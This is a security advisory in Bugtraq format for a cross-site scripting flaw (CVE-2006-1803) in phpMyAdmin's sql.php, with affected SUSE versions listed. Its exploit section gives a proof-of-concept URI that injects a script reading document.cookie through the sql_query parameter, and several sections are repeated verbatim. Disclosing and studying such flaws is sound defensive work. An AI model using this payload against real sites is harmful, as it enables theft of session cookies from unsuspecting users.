PHPMyAdmin SQL.PHP Cross-Site Scripting Vulnerability
BID:17487
Info
PHPMyAdmin SQL.PHP Cross-Site Scripting Vulnerability
| Bugtraq ID: | 17487 |
| Class: | Input Validation Error |
| CVE: |
CVE-2006-1803 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 31 2005 12:00AM |
| Updated: | Apr 28 2006 09:40PM |
| Credit: | p0w3r is credited with the discovery of this vulnerability. |
| Vulnerable: |
S.u.S.E. Linux Professional 10.0 OSS S.u.S.E. Linux Professional 10.0 S.u.S.E. Linux Professional 9.3 x86_64 S.u.S.E. Linux Professional 9.3 S.u.S.E. Linux Professional 9.2 x86_64 S.u.S.E. Linux Professional 9.2 S.u.S.E. Linux Professional 9.1 x86_64 S.u.S.E. Linux Professional 9.1 S.u.S.E. Linux Professional 9.0 x86_64 S.u.S.E. Linux Professional 9.0 S.u.S.E. Linux Personal 10.0 OSS S.u.S.E. Linux Personal 9.3 x86_64 S.u.S.E. Linux Personal 9.3 S.u.S.E. Linux Personal 9.2 x86_64 S.u.S.E. Linux Personal 9.2 S.u.S.E. Linux Personal 9.1 x86_64 S.u.S.E. Linux Personal 9.1 S.u.S.E. Linux Personal 9.0 x86_64 S.u.S.E. Linux Personal 9.0 phpMyAdmin phpMyAdmin 2.7 -pl1 |
| Not Vulnerable: | |
Discussion
PHPMyAdmin SQL.PHP Cross-Site Scripting Vulnerability
PHPMyAdmin is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
PHPMyAdmin is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Exploit / POC
PHPMyAdmin SQL.PHP Cross-Site Scripting Vulnerability
This issue can be exploited via a web client.
The following proof-of-concept URI is available:
http://www.example.com//phpmyadmin/sql.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=fu&table=fu&goto=tbl_properties_structure.php&back=tbl_properties_structure.php&sql
_query=SELECT+*+FROM+%60'%3Cscript%3Ealert(document.cookie)%3C/script%3E'%60
This issue can be exploited via a web client.
The following proof-of-concept URI is available:
http://www.example.com//phpmyadmin/sql.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=fu&table=fu&goto=tbl_properties_structure.php&back=tbl_properties_structure.php&sql
_query=SELECT+*+FROM+%60'%3Cscript%3Ealert(document.cookie)%3C/script%3E'%60
Solution / Fix
PHPMyAdmin SQL.PHP Cross-Site Scripting Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected]
SUSE Linux has released a security summary report addressing this and other issues.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected]
SUSE Linux has released a security summary report addressing this and other issues.
References
PHPMyAdmin SQL.PHP Cross-Site Scripting Vulnerability
References:
References: